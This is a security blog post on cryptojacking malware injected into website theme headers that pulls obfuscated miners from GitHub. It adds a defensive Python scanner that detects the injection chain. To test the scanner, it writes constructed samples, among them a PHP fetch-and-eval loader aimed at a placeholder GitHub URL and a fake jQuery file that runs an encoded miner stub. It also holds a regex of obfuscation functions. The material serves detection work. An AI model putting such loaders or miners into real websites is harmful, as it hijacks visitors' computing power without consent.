Crypto Mining Malware on Popular Code Repositories


Crypto Mining Malware on Popular Code Repositories | Quttera blog

Cryptocurrency mining malware is gaining popularity among attackers, who now use GitHub and other well-known code repositories to store and serve their malicious code. On GitHub, throwaway free accounts are created to commit the obfuscated code, which the injected snippet later fetches from the repository. The encoded payload usually disguises itself as a legitimate jQuery or other familiar library file. Serving it from a trusted domain lets the download blend in with ordinary traffic and survive simple URL blocklists. It looks like this newer threat, cryptojacking, is here to stay in 2018. With the explosion of cryptocurrency it will become a significant part of the global web malware landscape, and we expect cyber-criminals to keep hijacking websites and their visitors' systems to exploit them as free computing power.

Let's have a look at code that was recently detected by ThreatSign website security monitoring and turned out to be another cryptocurrency mining infection.

Malware Analysis

The infection is commonly placed in the theme's header file:

[Screenshot in the original post: the obfuscated injection in the theme's header file]

Once decoded, the injected code connects to GitHub to download a second-stage file:

[Screenshot in the original post: the decoded code that downloads the file from GitHub]

The content of the file downloaded from GitHub:

MD5: D7A539C0E2F1DAC800030CAB72C3A968

[Screenshot in the original post: the encoded content of the file downloaded from GitHub]
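The chain above (an obfuscation wrapper in a theme file that decodes to a GitHub download, and a second-stage payload identified by its MD5) is the kind of thing a site owner can check for without waiting for a scanner report. The following is an added example and not code from the Quttera post or from ThreatSign: it walks a theme directory, flags PHP/JavaScript obfuscation wrappers, peels nested base64 layers to expose any hidden GitHub URL, and compares every file's MD5 with the hash published above. The sample files it writes, and the account, repository and file names inside them, are constructed for the demo and are not indicators from the post.

```python
"""Added example: scan theme files for the injection chain described in the post.
Sample files, account/repository names and the miner snippet are constructed."""
import base64
import hashlib
import re
import tempfile
from pathlib import Path

IOC_MD5 = "d7a539c0e2f1dac800030cab72c3a968"   # MD5 published in the post, lowercased

# Functions that routinely wrap obfuscated injections (PHP and browser JS).
OBFUSCATION_MARKERS = re.compile(
    r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|atob)\s*\(", re.I)
# Long runs of base64 alphabet; shorter runs are usually ordinary identifiers.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
GITHUB_URL = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|gist\.github\.com|github\.com)/[^\s'\"<>]+", re.I)


def decode_layers(text: str, max_depth: int = 5) -> list[str]:
    """Base64-decode every long blob found, then repeat on the decoded text,
    up to max_depth layers. Only base64 is unpacked; gzinflate/rot13 wrappers
    are reported as markers but not decoded here."""
    layers, frontier = [], [text]
    for _ in range(max_depth):
        nxt = []
        for chunk in frontier:
            for blob in B64_BLOB.findall(chunk):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
                except ValueError:          # binascii.Error is a ValueError
                    continue
                # keep only text-like output; random blobs decode to binary junk
                if decoded and all(c.isprintable() or c in "\r\n\t" for c in decoded):
                    layers.append(decoded)
                    nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return layers


def scan_file(path: Path) -> dict:
    raw = path.read_bytes()
    text = raw.decode("utf-8", "ignore")
    layers = decode_layers(text)
    urls = {m.group(0) for chunk in [text, *layers] for m in GITHUB_URL.finditer(chunk)}
    markers = sorted({m.group(1).lower() for m in OBFUSCATION_MARKERS.finditer(text)})
    md5 = hashlib.md5(raw).hexdigest()
    return {
        "path": str(path),
        "md5": md5,
        "ioc_match": md5 == IOC_MD5,
        "obfuscation": markers,
        "decoded_layers": len(layers),
        "github_urls": sorted(urls),
        # a wrapper alone is a weak signal; a wrapper hiding an encoded payload
        # or a remote fetch, or a known-bad hash, is a strong one
        "suspicious": md5 == IOC_MD5 or bool(markers and (layers or urls)),
    }


def scan_dir(root: Path) -> dict[str, dict]:
    """Scan PHP and JS files under root; results keyed by path relative to root."""
    return {str(p.relative_to(root)): scan_file(p)
            for p in sorted(root.rglob("*")) if p.suffix in (".php", ".js")}


def build_samples(root: Path) -> None:
    """Write constructed samples that mimic the post's chain (hypothetical names)."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    url = "https://raw.githubusercontent.com/example-account/example-repo/master/jquery.min.js"
    # stage 1: PHP that fetches the URL hidden one base64 layer down and evals it
    stage1 = "$u=base64_decode('%s');$c=@file_get_contents($u);eval($c);" % b64(url)
    (root / "header.php").write_text(
        "<?php eval(base64_decode('%s')); ?>\n<!DOCTYPE html>\n<head></head>\n" % b64(stage1))
    (root / "clean.php").write_text("<?php get_header(); ?>\n<div class=\"site\"></div>\n")
    # stage 2 lookalike: a 'jQuery' file whose only job is to eval an encoded miner
    (root / "jquery-1.12.4.min.js").write_text(
        "/*! jQuery v1.12.4 */\neval(atob('%s'));\n" % b64("var miner={throttle:0.5};miner.start();"))


def demo() -> dict[str, dict]:
    """Build the constructed samples in a temporary directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_samples(root)
        return scan_dir(root)


if __name__ == "__main__":
    for name, r in demo().items():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {name}  wrappers={r['obfuscation']} layers={r['decoded_layers']} md5={r['md5']}")
        for u in r["github_urls"]:
            print(f"           fetches {u}")
```

Point `scan_dir` at a real theme directory (for example the `themes/` folder of a backup) to use it outside the demo. The MD5 comparison only catches that one known payload; the wrapper-plus-hidden-fetch heuristic is what generalizes, and any hit should be reviewed by hand, since legitimate plugins occasionally ship base64 blobs of their own.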

Following the decoding routine to uncover the content of that file yields the following:

[Screenshot in the original post: the decoded content of the downloaded file]

Notice that in the script above, the first active line of code (hidden inside an otherwise ordinary-looking JavaScript file) is the one responsible for throttling the visitor's CPU usage for mining, i.e. it caps how much of the CPU the miner consumes so that the slowdown is less likely to be noticed:

[Screenshot in the original post: the line that throttles the visitor's CPU usage]
